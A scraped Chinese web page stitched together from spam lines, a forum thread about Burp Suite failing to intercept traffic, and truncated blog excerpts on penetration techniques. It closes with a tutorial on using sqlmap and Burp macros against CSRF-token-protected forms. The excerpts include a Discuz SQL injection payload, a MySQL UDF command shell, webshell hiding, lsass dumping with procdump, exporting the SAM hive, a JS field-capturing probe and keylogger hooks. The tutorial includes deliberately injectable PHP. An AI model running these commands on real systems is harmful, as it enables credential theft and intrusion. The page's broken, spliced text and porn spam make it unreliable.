来一位会用burpsuite暴力破解的大神 要很熟练那种

碰碰ge成人视频 柔软,现在还有什么网址可以看a图片?
友情链接:查看: 2049|回复: 4
burpsuite不能抓包求大神
晚上在折腾burpsuite(1.6pro 破解版),安装了JAVA环境,修改了端口,可是怎么搞burpsuite都没有任何反应。
不知道是哪里出了问题,网络上搜索了很多,但是貌似没有类似的问题产生?
按照一般的教程,我检查了以下的步骤:
1、JAVA环境变量的设置
2、修改了代理端口,默认8080,换了别的端口依旧没用
3、换了3款浏览器测试,IE,猎豹和chrome
但是burpsuite始终不能截取数据。求各位指导。谢谢
设置 127.0.0.1:端口,还能正常上网? 如果没弄好的话
[]: new4 乐于助人,奖励 2 AB 暗币.
IE浏览器中和burpsuite中都置了代理127.0.0.1:8080,但是还是不能显示抓包数据
墙呢??被什么拦截了??
除了burpsuite里面要设置127.0.0.1,端口8080。
还要首先在你的IE或者chorme都要在“工具”下面的“网络”下面的“代理设置”,把浏览器的代理同样设置为127.0.01,端口8080.
然后再重启浏览器,重启burpsuite。
最后,点击burpsuite下的proxy下的inception,就OK了。
站长推荐 /3
为更好地促进会员间的相互交流,经管理团队讨论,决定即日起开启论坛的暗组认证申请,两种认证类型:1、学生认证 2、单位或个人认证。通过认证立即获得100AB奖励!
这年头不仅帮助别人有回扣拿,还有奖品拿啊!你是那个热心的人吗?来试试吧,U盘周周送,每周参加总会有一天能中的!
暗组定制8G SLC+8G MLC,套餐购买只要88元。品牌那种TLC芯片的U盘你还是扔了吧,用MLC或SLC更稳定更快速!现在购买还送SecLight定制充电线!
Powered by  方法一
  ::GetCommandLine();
  将获取到 &C:\test\app.exe& -1 -2
  方法二
  for (int i=0;i
  __argv[i];
  将依次得到C:\test\app.exe -1 -2
  方法三
  AfxGetApp()-&m_lp...
6.2号(可能更早)看到网上这个exp,是一个discuz 7.2的sql注射漏洞
经过多番考证,网上多数exp中都存在这些或者那些的问题,我自己利用和修改后总结,利用方法如下:
 Discuz 7.2 /faq.php SQL注入漏洞
1.获取数据库版本信息
faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and ...
wce是与gethashes 和mimikatz齐名的一款hash管理工具...
psExec是微软pstools工具包中最常用的一个工具,也是在内网渗透中的免杀渗透利器。
psExec能够在命令行下在对方没有开启telnet服务的时候返回一个半交互的命令行,像telnet客户端一样。非常方便我们的工作,之所以叫半交互是因为这个命令行不能够执行一条命令中有交互的回显,比如runas的密码输入。
使用方法如下:
PsExec v2.11 - Execute processe...
最近写的东西中常常需要嵌入一些浏览器,微软提供了一个比较好的接口,可以在MFC写的程序中嵌入一个简易的浏览器,是以ActiveX插件的形式提供的接口,使用起来也比较的方便,这里我就简单记录下这个插件的使用
这里我用vc6为例吧,我的机器太烂,跑不动vs这种巨人级别的软件。
首先创建一个对话框,在对话框上右击插入ActiveX的插件
可以看到微软提供了很多ActiveX的插件供我们选择...
找了找菜刀中的预存连接串格式中没有postgresql,自己写了一个
在jsp的shell中使用这样的连接串
org.postgresql.Driver
jdbc:postgresql://localhost/cbfbirnweb?user=&password=
php的等用到再说把...
熟悉mysql的同志大家都知道,mysql版本的更替很快,也导致了黑客技术的变化。
最明显的就是在使用udf提权时候的变化
这时候的版本帖主不是非常清楚,因为没有实际遇到过,就从网络资料上抄了一些来,这时候的udf的限制比较松,可以使用绝对路径的UDF,比如
create function cmdshell returns string soname ‘c:/test/udf.d...
分享一个释放资源的类
BOOL CLinuxShellDlg::ReleaseRes(CString strFileName, WORD wResID, CString strFileType)
dwWrite=0;
// 创建文件
hFile = CreateFile(strFileName, GENERIC_...
主要是利用系统保留文件名创建无法删除的webshell来隐藏后门。
Windows 下不能够以下面这些字样来命名文件或文件夹:
aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9  
但是通过cmd的copy命令即可实现:
众所周知mimikatz可以直接抓到存放在lsass进程中的明文密码,但是很多情况下有杀软这种瘟神挡道,我们必须另想办法。
procdump是微软官方提供的一个小工具,在微软官方有下载
将工具拷贝到目标机器上执行如下命令(需要管理员权限)
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
获得一个lsass进程的内存dump文...
root权限登入后获得/etc/shadow文件之后文本打开
shadow 文件:
在linux系统中, /etc/shadow 文件存放着用户的密码哈希值。
shadow中存放的密码密文格式如下:
$id$salt$encrypted
其中id是指使用的哈希算法:
可取如下值:
    ID  | Method
--------...
许多小黑门喜欢用工具导出hash,比如gethashes,wce,pwdump但是现在杀毒日盛,这类工具越来越没有生存的余地了,这里介绍一种非常好的方法,用一个批处理导出hash并拖回本地破解
在系统权限下有cmd命令执行的shell中执行
reg save hklm\sam sam.hive
reg save hklm\system system.hive...
各个版本的探针,记录的信息包括ip,时间,操作系统,...
很多时候我们需要抓取js代码写的一些输入框的内容,由于js是前段服务器解析的,而php,asp这种是服务器解析的,js截获的数据必须通过某些方法传递给后台的数据库,所以理所当然的想到让js通过POST或者GET的方法请求一个后台的URL。但这种请求要是异步的,如果做同步的请求,浏览器就会跳转到探针链接而跳转不回来。
这里提供两种方法,一个是用js弹出一个IFrame的子窗口长宽设置成0,这种方法...
很多大大都在用burpsiute,大大们说这个工具的功能有很多很多,小菜我也不知到底是些什么。然后找了篇大大写的Burpsiute截断上传拿webshell的科普帖看了看,然后去实践了一下。
在后台上传图片的地方添加xxx.jpg 图片
打开burpsiute
进入proxy后进入options修改代理端口等
然后设置浏览器...
配置XP成为VPN服务器
实验编号:Benet_Win2003_binaryjp_
实验名称:配置Windows XP VPN服务器
完成时间:日 20:40——日 23:50
实验环境:Windows XP SP2,ADSL网络连接
实验目的:配置XP成为VPN服务器,接受客户端的远程访问,不使用第三方软件...
wordpress这种CMS国外用的非常多,安全性还是不错的,跟新快,看到这种东西,除了管理员架好之后就托管的垃圾站,持续更新的wordpress还是很让人头疼的。
如果通过某种方法拿下了webshell,拖库之后会发现wp_user这个wordpress这个用户表,里面的密码加密方法还是让人绝望的,我大概找了找这方面的资料发现他的加密方法如下(此处引用):
消失了好一阵子,从今天起开始写博客,不为了别的只为了记录下这些精妙的方法,免得自己忘记
ColdFusion(直译:冷聚变),是一个动态Web服务器,其CFML(ColdFusion Markup Language)是一种程序设计语言,类似现在的JavaServer
Page里的JSTL(JSP Standard Tag Lib),从1995年开始开发,其设计思想被一些人认为非常先进,被一些...
Inline API HOOK方法有很多,常见的一种方法无需内嵌汇编语句,原理简单易懂,针对64位微软操作系统不允许内嵌汇编这种无解的事比较给力(列宁大神提供的消息,本人未亲自尝试)。下面简单说一下这种方法的原理。
       首先说一说inline HOOK的原理,具体的资料上说的很多了,我只是想提一下核心的技术实现,主要是修改映射到内存的api函数的执行代码的第一条指令(一般是第一条指令)...
很多人纠结如何在win32 application下显示一个类似这样的输入框。而win32下又不兼容MFC的内容怎么办?可能我们就需要自己写这个对话框了。
首先将这个对话框画好作为资源保存到我们的win32程序中,具体做法如下:
创建一个空的win32 Application程序。
点击菜单栏上的Insert(插入)-&Resource(资源),选择对话框资源,然...
线程注入有很多种方法,有最简单也最方便安全的SetWindowsHookEx的钩子注入,也有代码简洁的远程线程创建注入。
这种方法构思巧妙,但是个人觉得直接硬写目标进程内存空间有一定风险,可谓差之毫厘,谬以千里。本菜鸟这个程序调试了很长时间才成功的,大牛请勿发笑。
CreatRemoteThread从字面意思上不难理解,创建一个远程线程,所以我们可以用他在目标进程中创建一个线程,立即执...
其实是一个比较容易的问题,我来分享一下我的做法。
所有的操作都是在HKEY_CLASSES_ROOT根键中,先来看一下图
前面看到的. fif   .exc   .ffl等等都是一些文件后缀名,比如exe文件的后缀就是.exe,打开它我们会看到默认键值下的内容是exefile:
那么我们就得到了关联exe文件的注册表项名称就是exefile,同样是在HKEY_CLASSES_R...
新学期新气象,一般是小学作文的开头,在此引用一下。
最近有时间坐下来仔细研究一下PE文件结构了,以前遇到这种问题时总是拆东墙补西墙。学的不够透彻。几天来一番研究之后,和大家分享一下。
PE的文件结构从DOS头开始,其主要作用就两个一个是若是在DOS环境下输出一句话。另一个作用就是找到PE文件头的位置,这是我们要关心的,本文只注重所要关心的问题——导出表。和一些你再众多网上资料上很难找到的细节,...
以前在学习钩子的时候对于WH_DEBUG这个类型很是不解释,不知道它是做什么用的,在网上找了一找,发现也没有什么有价值的文章。在逆向分析“热血江湖”突然发现WH_DEBUG竟被用来进行反键盘记录(这是老版本,现在的版本已经用了最新的技术,原理没弄明白,哪位要是弄明白了,希望可以指点一下)。仔细研究了一下,弄明白了其中的原理,现在就介绍给一下。
首先要将WH_DEBUG介绍一下。WH_DEBUG为...
combo box控件用法:
下拉选择控件,首先将控件拖动到你需要使用控件的地方,用ClassWizard为它关联一个变量,我们注意到变量类型是CString型的。右击属性,General中可以设置一般属性类容Data中可以设置该控件下拉选择的内容,Styles中设置combo box控件风格,Extended Styles设置扩展风格,主要的设置在Data中,Data中设置了下拉菜单的所有下拉...
论坛上一个大牛推荐的一个文章,新手拜读(英语不好找goole在线翻译):
E PassView v1.26 - Recover lost passwords stored by Internet Explorer
Copyright (c) 2006 - 201...
gina,正如微软官方说明所说的:
The GINA operates in the context of the Winlogon process and, as such, the GINA DLL is loaded very early in the boot proc...
这是最近的一段代码。
也没有什么好说的,简单的socket编程,设置网卡为混杂模式,接受所有封包,并打印所有封包的基本信息,及内容。
#pragma comment(lib,&...
这也是好久以前的代码了。我是菜鸟,在这个问题上研究的不够深,说错了还请大牛指正。
这个问题也是一个老问题,不过我是菜鸟我有话要说。我在做这个问题的时候查阅了好多资料,其实这个问题不能算解决,这篇文章你将会看到一段比较长的代码,其实这段代码不是我写的,是网上一个比较有名的人...
这是很久以前的一个代码了。
网络扫描,扫描器这些名词想必大家并不陌生,踩点啥的必备工具。扫描的方法多种多样,目的也多种多样,本菜鸟就随便找了找资料简单介绍一下:
1  主机存活扫描技术
      主机扫描的目的是确定在目标网络上的主机是否可达。这是信息收集的初级阶段,其效...
呵呵,这也是我无意中弄出来的一个小东西,大牛就飘过吧。
这个程序就短短几行代码,但是值得注意的是里面一个64位数的输出转换问题,说实话我也不是太了解,因为编程很少用到这么一个大的数,先上代码:
#include &windows.h&
#include &Winbase.h...
好久没写博客了,最近想抽点时间补上之前的东西,有些东西要记录下来,以后看了会觉得很有意思。
这个小工具没有什么可以说的,直接vc编译连接就可以用了。下面附上代码:
#include &stdio.h&
int main()
printf(...
首先我们要知道什么是输入法,我们经常用输入法,但是你发现一个现象没有?,在任务管理器中并没有看到输入法进程。当然了搜狗那种流氓软件除外,说不定正在后台做什么偷偷摸摸的事情,当然要创建进程。输入法的核心文件你找到安装目录就会发现一个后缀是.ime的文件,你用十六进制查看器看看就会发...
如何捕捉一个未知窗口的按钮按下的消息?方法多种多样,这里我就介绍一种比较常见的方法——钩子。       原理上很简单也很容易理解,安装一个系统的全局钩子,过滤所有的系统消息,当然了,可以过滤制定的系统消息,比如按钮常用的发给窗口的WM_COMMAND消息,然后判断这个消息的一些...
最近在论坛上看到一个帖子,读取输入框中的内容,我也正在做这方面东西,于是就动手做了一下,原本以为很简单的东西,实际着手去做的时候倒是遇到了不小的麻烦。       首先想要获得一个未知的对话框的EDIT控件的内容无非就是几个步骤:1,获得所要获得内容的句柄2,获得控件句柄3,获得...
RegQueryValueEx
无法获取长的键值名;
如何读出REG_DWORD值.
很久没有写博客了,今天写写一个以前没有写过的话题,缓冲区溢出shellcode编写。我是菜鸟,以前没有写过shellcode,最近也在忙着网络的渗透,栈溢出也是零零碎碎的看到一些知识,大牛飘过,菜鸟言论仅供娱乐。大家同是菜鸟的人可以看看,我是站在初学者的角度写这篇文章的,所以初学者应该比较容易理解。对于一些复杂的shellcodet我们暂且先不谈,我们先来看看自己编写一个打开cmd窗口的shellcode。其实黑客防线上有位大神执笔写了一系列exploit的编...
        好久没写博客了,只因为最近一段时间着手学习网络入侵与渗透这块,正好借了一个大学生创业孵化基地的项目,也申请了一个关于“蜜罐”设计的科研立项,准备一起给做了,由于刚刚踏入未知领地,也没什么好说的,让我在这个领域摸黑探索一会再和大家分享我的学习历程。     今天来写一篇博客,也是好久前的了,一直拖着没写,这篇博客的内容也正是我大概一个月前的《黑客防线》的投稿,可能是运气有点好吧,这篇文章拟发《黑客防线》2011年第5期,还没有出来,快了,10号左右吧。另外想说的一句是黒...
魔兽改键自己做...
R3下的钩子线程注入...
      一大早的来到图书馆还把我的本本抗来了,就为了写一篇博客。      这个博客其实说来挺愧疚的,原理搞错了,却也实现了预期之外的功能,如题R3下的自身进程守护。      昨天下午和“列宁”交流了一下午,才发现原来我本来的构想就是错误的,我本想挂钩Terminateprocess的函数达到禁止制定进程被结束的,但是意外的把挂钩的原理搞错了,程序倒是写了一堆,就是不能实现功能。把我给急的,后来昨天下午偶遇高人“列宁”,探讨了一下午,我终于搞清楚我的错误在哪里,(其...
      从所周知,在Windows NT/2000系统的API黑洞之一便是NTDLL.DLL,此DLL包含了许多未公开的API函数。本文将列举一、二,并以如何获取任何指定进程的父进程ID为例作为示范。   NTDLL.DLL中有一个函数叫NtQueryInformationProcess,用它可以将指定类型的进程信息拷贝到某个缓冲。其原型如下:NTSYSAPINTSTATUSNTAPINtQueryInformationProces...
       呵呵,最近博客写的有点频繁,我这个人耐不住性子,有点东西就要拿出来让大家分享一下,虽然不一定都是好的。最近一直在做HOOK,从内核驱动到用户层的API函数,基本上都尝试过了,昨天下午搞了一下午,写了一个R3下设置全局钩子截获键盘记录的小程序,虽然网上可能多得是,但是我认为菜鸟贵在自己动手做,哪怕是从网上从书上借鉴来的,你都要自己理解以后上机动手做一遍,这样你会发现很多你以前从未发现过的东西。     不扯淡了,直接看代码。另注:像我们这种菜鸟的代码一般都有点...
  经过两个星期的折腾,SSDT HOOK终于成功了,在这里首先感谢论坛里的一位大神,真的是非常感谢,他的ID是什么记不得了,加了他的好友,记得他的名字下面写着列宁两个字,呵呵很有趣的名字啊,想加的人可以看一看我发的帖子。  这里闲扯淡两句,论坛里的大神级别的人物还是不少的,我们不能用等级来衡量一个人的知识水平,就像那天看到一个急聘c++高级程序员的帖子,两星级以上的用户优先录取,我觉着吧,这是不明智的举动,我认识的那位内核大神就是五裤衩的裤衩级用户。有人说的对,裤衩级的大神多得是,星级的菜鸟也到处都是。 ...
关心我的同志们可能又要说了,哈哈,这个菜鸟又要发话了,嘿嘿,我菜鸟我荣幸。最近的编程走向白热化,因为刚开学,所以时间比较多,所以经常泡图书馆。下决心这学期一定搞定内核级编程,大话放出去了,实现与否还得看造化了。刚刚迈入驱动程序设计的老高的门槛,发现原来困难重重,内核程序设计不同于一般的用户层的接口程序设计,有大量的帮助资料,网上的,MSDN,论坛里的,各种各样,连绵不绝。到了内核态,帮助资料也少了,论坛的回复也少了,错误也比以前更难调试了,所以一下子不知道咋办,手足无措,...
360旧版本的漏洞...
最近想想貌似自己的的想法还不少,所以一直在做东西。由于没有经验所以进展比较慢,但每次看到自己的成果时都会无比的激动,这种感觉是美妙的,其实热爱一件事情,你就会感到是你在享受做这件事的过程结果,而不是这件事本身在玩弄你,兴趣是学习的动力。好了不吹了进入正题。最近在做一个程序的时候,需要删除一项注册表项,这个注册表项包含子项。由于没有这个API编写的经验,所以走了不少弯路,呵呵原谅一个菜鸟在这边大放厥词把。我最先想到的函数是RegDeleteKey,并觉得一个注册表的删除能难...
AdjustTokenPrivileges提权...
INF文件格式要求一个INF文件是以段组织的简单的文本文件。一些段油系统定义(System-Defined)的名称,而另一些段由INF文件的编写者命名。每个段包含特定的条目和命名,这些命名用于引用INF文件其它地方定义的附加段。INF文件的语法规则:1、要求的内容:在特定的INF文件中所要求的必选段和可选段、条目及命令依赖于所要安装的设备组件。端点顺序可以是任意的,大多数的INF文件安装惯用的次序来安排各个段。2、段名:INF文件的每个段从一个括在...
访问:148772次
积分:1970
积分:1970
排名:第10172名
原创:42篇
评论:102条
(1)(1)(2)(1)(1)(2)(1)(1)(1)(3)(1)(1)(2)(2)(4)(1)(1)(6)(3)(3)(7)(3)(1)用Burpsuite 来处理csrf token - 推酷
用Burpsuite 来处理csrf token
from: .au/fuzzing-and-sqlmap-inside-csrf-protected-locations-part-1/
.au/fuzzing-and-sqlmap-inside-csrf-protected-locations-part-2/
问题:http://drops.wooyun.org/tips/2444
附加其他案例(--eval):
当在测试某些网站注入时我们会遇到token,只能手工或者写工具之后进行自动化处理,就sqlmap和burpsuite而言各有各的方法。
Sqlmap如下:
CGY@Hank-PC /pentest/databases/sqlmap
$ python sqlmap.py -u &http://192.168.83.117/2.php& --data=&token=123&id=root& --eval=&import urllib2;a=urllib2.build_opener();a.addheaders.append(('Cookie', 'PHPSESSID=72u0q0sem6tbnrqq4bmqs4an05'));token=re.search(r'\w{32}',a.open('http://192.168.83.117/2.php').read()).group(0);& -p id --dbs --cookie=&PHPSESSID=72u0q0sem6tbnrqq4bmqs4an05& --current-user
Burpsuite如下:
在burpsuite 里提供了一个session handler 机制,可以让我们更好的去自动化处理这些。 事例代码如下:
* PHP简单利用token防止表单重复提交
* 此处理方法纯粹是为了给初学者参考
session_start();
var_dump($_REQUEST);
function set_token() {
$_SESSION['token'] = md5(microtime(true));
function valid_token() {
$return = $_REQUEST['token'] === $_SESSION['token'] ? true :
set_token();
//如果token为空则生成一个token
if(!isset($_SESSION['token']) || $_SESSION['token']=='') {
set_token();
error_reporting(E_USER_ERROR | E_USER_WARNING | E_USER_NOTICE);
@mysql_connect(&127.0.0.1&.':'.&3306&,root,'123')
or die(&数据库服务器连接失败&);
@mysql_select_db('mysql')
or die(&数据库不存在或不可用&);
if(isset($_POST['id'])){
if(!valid_token()){
echo &token error&;
//echo '成功提交,Value:'.$_POST['test'];
$id=$_REQUEST[id];
$sql='select user,password,host from mysql.user where user='.&'&.$id.&'&.' limit 0,1;';
mysql_query('$sql');
$set_result = mysql_query($sql);
while($row =mysql_fetch_array($set_result)){
$result[]=$
var_dump($result);
//echo &SESSION &.$_SESSION['token'];
&form method=&post& action=&&&
&input type=&hidden& name=&token& value=&&?php echo $_SESSION['token']?&&&
&input type=&text& name=&id& value=&root&&
&input type=&submit& value=&提交& /&
在options 栏目的sessions标签里 添加 session handling rules,调出 session handling rule editor:rule description 规则的描述;rule actions 规则的主体部分。 在rule actions 添加 run a macro 类型的调用,调出 session handling action editor ,选择 select macro 下的add ,用于添加macro ,出现两个对话框: macro editor和macro recorder ,前者是用于macro 的分析和设定,后者对于请求的一个录制。 在macro recoder 里 设定intercept is off (右上角位置),切换到浏览器 先请求一次 127.0.0.1/2.php 之后对于表单内容进行提交。切到macro recorder 里,用ctrl选中这两次请求,点击 OK 。就此回到了macro editor 窗口,点击test macro 观看请求和响应数据包中的token 是否正确。
如果不正确,单击分析re-analyze macro或者选择configure item 进行修正,如下图。
Macro Editor 配置完之后,窗口回到了 session handling action editor。 在sqlmap-&burpproxy 测试时, marco 会把我的id参数只指定为root1(marco录制时id指定的是root1,至于这样的原因有待测试),不会发送我的payload,而在intruder 则不出现此问题 。设置只替换token参数即可,设置如下图:
在select macro 里选定刚才录制的 macro,确定。回到session hand rule editor ,在其子标签scope里,:设置作用域(根据自己的实际情况再定):
运行结果如下:
已发表评论数()
&&登&&&录&&
已收藏到推刊!
请填写推刊名
描述不能大于100个字符!
权限设置: 公开
仅自己可见老妇重口味做爱,丁香黄色裸体像最新网址_丁香黄色裸体像图片图床,丁香黄色裸体像视频影片介绍
友情链接:

我要回帖

更多关于 burpsuite下载 的文章

 

随机推荐